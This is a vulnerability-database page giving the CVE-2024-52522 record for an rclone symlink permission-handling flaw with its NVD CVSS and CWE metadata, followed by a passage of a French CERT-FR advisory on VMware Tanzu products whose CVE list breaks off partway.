Vulnerability-Lookup

CVE-2024-52522 (GCVE-0-2024-52522)

Vulnerability from cvelistv5 – Published: 2024-11-15 17:15 – Updated: 2024-11-21 14:56

Title

Rclone Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata

Summary

Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2.

Severity ?

5.4 (Medium)


                        
                          CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE

CWE-59 - Improper Link Resolution Before File Access ('Link Following')
CWE-61 - UNIX Symbolic Link (Symlink) Following
CWE-281 - Improper Preservation of Permissions

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	rclone	rclone	Affected: >= 1.59.0, < 1.68.2

FKIE_CVE-2024-52522

Vulnerability from fkie_nvd - Published: 2024-11-15 18:15 - Updated: 2024-11-21 15:15

Severity ?

5.4 (Medium) - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0
	security-advisories@github.com	https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2."
    },
    {
      "lang": "es",
      "value": "Rclone es un programa de l\u00ednea de comandos para sincronizar archivos y directorios desde y hacia diferentes proveedores de almacenamiento en la nube. El manejo inseguro de enlaces simb\u00f3licos con --links y --metadata en rclone mientras se copia al disco local permite a los usuarios sin privilegios modificar indirectamente la propiedad y los permisos en los archivos de destino de los enlaces simb\u00f3licos cuando un superusuario o un proceso privilegiado realiza una copia. Esta vulnerabilidad podr\u00eda permitir la escalada de privilegios y el acceso no autorizado a archivos cr\u00edticos del sistema, lo que compromete la integridad, la confidencialidad y la disponibilidad del sistema. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.68.2."
    }
  ],
  "id": "CVE-2024-52522",
  "lastModified": "2024-11-21T15:15:33.637",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "LOW",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "ACTIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-11-15T18:15:30.643",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-59"
        },
        {
          "lang": "en",
          "value": "CWE-61"
        },
        {
          "lang": "en",
          "value": "CWE-281"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

CERTFR-2025-AVI-0524

Vulnerability from certfr_avis - Published: 2025-06-19 - Updated: 2025-06-19

De multiples vulnérabilités ont été découvertes dans VMware Tanzu. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
VMware	Tanzu Greenplum	Tanzu Greenplum Data Copy Utility versions antérieures à 2.8.0
VMware	Tanzu	Tanzu Data Lake versions antérieures à 1.1.0
VMware	Tanzu	Tanzu pour Postgres sur Kubernetes versions antérieures à 4.1.0 et 4.2.0
VMware	Tanzu Greenplum	Tanzu Greenplum Command Center versions antérieures à 6.14.0 et 7.4.0
VMware	Tanzu Greenplum	Tanzu Greenplum Backup and Restore versions antérieures à 1.31.1
VMware	Tanzu Greenplum	Tanzu Greenplum Streaming Server versions antérieures à 2.1.0
VMware	Tanzu Greenplum	Tanzu Greenplum versions 6.x antérieures à 6.29.1
VMware	Tanzu Greenplum	Tanzu Greenplum versions 7.x antérieures à 7.5.0
VMware	Tanzu	VMware Tanzu pour Valkey sur Kubernetes versions antérieures à 1.1.0 et 2.0.0

References

Title

Publication Time

Tags

Bulletin de sécurité VMware 35841	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35844	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35843	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35842	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35846	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35849	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35840	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35847	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35839	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35845	2025-06-18	vendor-advisory
Bulletin de sécurité VMware 35848	2025-06-18	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Tanzu Greenplum Data Copy Utility  versions ant\u00e9rieures \u00e0  2.8.0",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Data Lake versions ant\u00e9rieures \u00e0 1.1.0",
      "product": {
        "name": "Tanzu",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu pour Postgres sur Kubernetes  versions ant\u00e9rieures \u00e0 4.1.0 et 4.2.0",
      "product": {
        "name": "Tanzu",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum Command Center  versions ant\u00e9rieures \u00e0  6.14.0 et 7.4.0",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum Backup and Restore  versions ant\u00e9rieures \u00e0  1.31.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum Streaming Server  versions ant\u00e9rieures \u00e0  2.1.0",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum  versions 6.x ant\u00e9rieures \u00e0  6.29.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum  versions 7.x ant\u00e9rieures \u00e0  7.5.0",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "VMware Tanzu pour Valkey sur Kubernetes  versions ant\u00e9rieures \u00e0 1.1.0 et 2.0.0",
      "product": {
        "name": "Tanzu",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2019-2126",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-2126"
    },
    {
      "name": "CVE-2020-11023",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-11023"
    },
    {
      "name": "CVE-2019-12900",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-12900"
    },
    {
      "name": "CVE-2022-30633",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30633"
    },
    {
      "name": "CVE-2022-1705",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-1705"
    },
    {
      "name": "CVE-2022-27664",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
    },
    {
      "name": "CVE-2022-28131",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-28131"
    },
    {
      "name": "CVE-2022-32148",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32148"
    },
    {
      "name": "CVE-2022-32189",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32189"
    },
    {
      "name": "CVE-2022-1962",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-1962"
    },
    {
      "name": "CVE-2022-30635",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
    },
    {
      "name": "CVE-2022-30631",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30631"
    },
    {
      "name": "CVE-2022-30632",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30632"
    },
    {
      "name": "CVE-2022-30630",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30630"
    },
    {
      "name": "CVE-2022-29526",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
    },
    {
      "name": "CVE-2021-45943",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-45943"
    },
    {
      "name": "CVE-2021-34141",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-34141"
    },
    {
      "name": "CVE-2022-1941",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-1941"
    },
    {
      "name": "CVE-2022-1271",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-1271"
    },
    {
      "name": "CVE-2022-41862",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41862"
    },
    {
      "name": "CVE-2022-41717",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41717"
    },
    {
      "name": "CVE-2023-0464",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
    },
    {
      "name": "CVE-2022-2879",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-2879"
    },
    {
      "name": "CVE-2022-41715",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41715"
    },
    {
      "name": "CVE-2022-2880",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-2880"
    },
    {
      "name": "CVE-2023-0466",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
    },
    {
      "name": "CVE-2023-0465",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
    },
    {
      "name": "CVE-2022-30629",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30629"
    },
    {
      "name": "CVE-2022-41723",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41723"
    },
    {
      "name": "CVE-2022-30580",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30580"
    },
    {
      "name": "CVE-2022-40898",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-40898"
    },
    {
      "name": "CVE-2022-41725",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41725"
    },
    {
      "name": "CVE-2022-41724",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-41724"
    },
    {
      "name": "CVE-2023-24532",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24532"
    },
    {
      "name": "CVE-2023-24537",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24537"
    },
    {
      "name": "CVE-2023-2455",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
    },
    {
      "name": "CVE-2023-2650",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
    },
    {
      "name": "CVE-2023-24536",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24536"
    },
    {
      "name": "CVE-2023-24538",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24538"
    },
    {
      "name": "CVE-2023-1255",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-1255"
    },
    {
      "name": "CVE-2023-24540",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24540"
    },
    {
      "name": "CVE-2023-29400",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29400"
    },
    {
      "name": "CVE-2023-24539",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24539"
    },
    {
      "name": "CVE-2023-2975",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-2975"
    },
    {
      "name": "CVE-2023-3446",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
    },
    {
      "name": "CVE-2023-3817",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
    },
    {
      "name": "CVE-2023-29404",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29404"
    },
    {
      "name": "CVE-2023-29402",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29402"
    },
    {
      "name": "CVE-2023-29403",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29403"
    },
    {
      "name": "CVE-2023-29405",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29405"
    },
    {
      "name": "CVE-2023-37920",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
    },
    {
      "name": "CVE-2023-29409",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29409"
    },
    {
      "name": "CVE-2023-29406",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29406"
    },
    {
      "name": "CVE-2023-32681",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
    },
    {
      "name": "CVE-2023-44487",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
    },
    {
      "name": "CVE-2023-5363",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-5363"
    },
    {
      "name": "CVE-2023-4807",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
    },
    {
      "name": "CVE-2023-4752",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-4752"
    },
    {
      "name": "CVE-2023-45853",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
    },
    {
      "name": "CVE-2023-5678",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
    },
    {
      "name": "CVE-2023-5870",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
    },
    {
      "name": "CVE-2022-0543",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-0543"
    },
    {
      "name": "CVE-2023-4039",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-4039"
    },
    {
      "name": "CVE-2021-46848",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-46848"
    },
    {
      "name": "CVE-2023-4016",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-4016"
    },
    {
      "name": "CVE-2023-29383",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29383"
    },
    {
      "name": "CVE-2023-6237",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
    },
    {
      "name": "CVE-2023-39323",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39323"
    },
    {
      "name": "CVE-2023-31484",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
    },
    {
      "name": "CVE-2023-24534",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24534"
    },
    {
      "name": "CVE-2023-6129",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
    },
    {
      "name": "CVE-2023-39318",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39318"
    },
    {
      "name": "CVE-2023-39319",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39319"
    },
    {
      "name": "CVE-2024-0727",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
    },
    {
      "name": "CVE-2024-1580",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-1580"
    },
    {
      "name": "CVE-2016-2781",
      "url": "https://www.cve.org/CVERecord?id=CVE-2016-2781"
    },
    {
      "name": "CVE-2023-39326",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39326"
    },
    {
      "name": "CVE-2023-45285",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45285"
    },
    {
      "name": "CVE-2023-45288",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
    },
    {
      "name": "CVE-2024-4603",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
    },
    {
      "name": "CVE-2023-45289",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45289"
    },
    {
      "name": "CVE-2023-45290",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45290"
    },
    {
      "name": "CVE-2024-24783",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24783"
    },
    {
      "name": "CVE-2024-24784",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24784"
    },
    {
      "name": "CVE-2024-24785",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24785"
    },
    {
      "name": "CVE-2024-4741",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
    },
    {
      "name": "CVE-2024-23807",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-23807"
    },
    {
      "name": "CVE-2024-5535",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
    },
    {
      "name": "CVE-2023-5752",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
    },
    {
      "name": "CVE-2024-3651",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
    },
    {
      "name": "CVE-2024-3596",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-3596"
    },
    {
      "name": "CVE-2024-26458",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-26458"
    },
    {
      "name": "CVE-2024-26461",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-26461"
    },
    {
      "name": "CVE-2024-35195",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
    },
    {
      "name": "CVE-2023-4641",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-4641"
    },
    {
      "name": "CVE-2024-22365",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-22365"
    },
    {
      "name": "CVE-2024-22667",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-22667"
    },
    {
      "name": "CVE-2023-6228",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6228"
    },
    {
      "name": "CVE-2023-45287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-45287"
    },
    {
      "name": "CVE-2024-24787",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24787"
    },
    {
      "name": "CVE-2024-24788",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24788"
    },
    {
      "name": "CVE-2024-7348",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7348"
    },
    {
      "name": "CVE-2023-7008",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-7008"
    },
    {
      "name": "CVE-2024-6119",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
    },
    {
      "name": "CVE-2024-24789",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
    },
    {
      "name": "CVE-2024-34155",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
    },
    {
      "name": "CVE-2024-34156",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
    },
    {
      "name": "CVE-2024-34158",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
    },
    {
      "name": "CVE-2024-24790",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24790"
    },
    {
      "name": "CVE-2024-9143",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
    },
    {
      "name": "CVE-2022-48468",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-48468"
    },
    {
      "name": "CVE-2023-48161",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-48161"
    },
    {
      "name": "CVE-2024-11168",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
    },
    {
      "name": "CVE-2024-10976",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10976"
    },
    {
      "name": "CVE-2024-10977",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10977"
    },
    {
      "name": "CVE-2024-10978",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10978"
    },
    {
      "name": "CVE-2024-10979",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10979"
    },
    {
      "name": "CVE-2024-10041",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
    },
    {
      "name": "CVE-2024-10963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
    },
    {
      "name": "CVE-2025-21490",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21490"
    },
    {
      "name": "CVE-2025-21491",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21491"
    },
    {
      "name": "CVE-2025-21497",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21497"
    },
    {
      "name": "CVE-2025-21500",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21500"
    },
    {
      "name": "CVE-2025-21501",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21501"
    },
    {
      "name": "CVE-2025-21503",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21503"
    },
    {
      "name": "CVE-2025-21505",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21505"
    },
    {
      "name": "CVE-2025-21519",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21519"
    },
    {
      "name": "CVE-2025-21522",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21522"
    },
    {
      "name": "CVE-2025-21523",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21523"
    },
    {
      "name": "CVE-2025-21529",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21529"
    },
    {
      "name": "CVE-2025-21540",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21540"
    },
    {
      "name": "CVE-2025-21546",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21546"
    },
    {
      "name": "CVE-2025-21555",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21555"
    },
    {
      "name": "CVE-2025-21559",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-21559"
    },
    {
      "name": "CVE-2025-0938",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
    },
    {
      "name": "CVE-2025-0167",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
    },
    {
      "name": "CVE-2024-12797",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
    },
    {
      "name": "CVE-2024-13176",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
    },
    {
      "name": "CVE-2025-1094",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
    },
    {
      "name": "CVE-2022-49043",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
    },
    {
      "name": "CVE-2024-51744",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
    },
    {
      "name": "CVE-2024-24791",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
    },
    {
      "name": "CVE-2023-24531",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-24531"
    },
    {
      "name": "CVE-2024-45336",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
    },
    {
      "name": "CVE-2024-45341",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
    },
    {
      "name": "CVE-2025-22866",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
    },
    {
      "name": "CVE-2025-22870",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
    },
    {
      "name": "CVE-2024-56171",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
    },
    {
      "name": "CVE-2022-42967",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-42967"
    },
    {
      "name": "CVE-2024-8176",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
    },
    {
      "name": "CVE-2025-24928",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
    },
    {
      "name": "CVE-2025-22871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
    },
    {
      "name": "CVE-2025-22235",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
    },
    {
      "name": "CVE-2025-31650",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31650"
    },
    {
      "name": "CVE-2025-31651",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31651"
    },
    {
      "name": "CVE-2025-30204",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
    },
    {
      "name": "CVE-2025-27363",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
    },
    {
      "name": "CVE-2025-22233",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22233"
    },
    {
      "name": "CVE-2024-55549",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
    },
    {
      "name": "CVE-2024-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
    },
    {
      "name": "CVE-2025-22869",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
    },
    {
      "name": "CVE-2025-46701",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-46701"
    },
    {
      "name": "CVE-2024-12133",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
    },
    {
      "name": "CVE-2024-12243",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
    },
    {
      "name": "CVE-2024-2236",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
    },
    {
      "name": "CVE-2025-0395",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0395"
    },
    {
      "name": "CVE-2025-1390",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-1390"
    },
    {
      "name": "CVE-2025-31115",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31115"
    },
    {
      "name": "CVE-2012-0880",
      "url": "https://www.cve.org/CVERecord?id=CVE-2012-0880"
    },
    {
      "name": "CVE-2017-17507",
      "url": "https://www.cve.org/CVERecord?id=CVE-2017-17507"
    },
    {
      "name": "CVE-2017-8806",
      "url": "https://www.cve.org/CVERecord?id=CVE-2017-8806"
    },
    {
      "name": "CVE-2018-10126",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-10126"
    },
    {
      "name": "CVE-2018-11205",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-11205"
    },
    {
      "name": "CVE-2018-13866",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13866"
    },
    {
      "name": "CVE-2018-13867",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13867"
    },
    {
      "name": "CVE-2018-13868",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13868"
    },
    {
      "name": "CVE-2018-13869",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13869"
    },
    {
      "name": "CVE-2018-13870",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13870"
    },
    {
      "name": "CVE-2018-13871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13871"
    },
    {
      "name": "CVE-2018-13872",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13872"
    },
    {
      "name": "CVE-2018-13874",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13874"
    },
    {
      "name": "CVE-2018-13875",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13875"
    },
    {
      "name": "CVE-2018-13876",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-13876"
    },
    {
      "name": "CVE-2018-14031",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-14031"
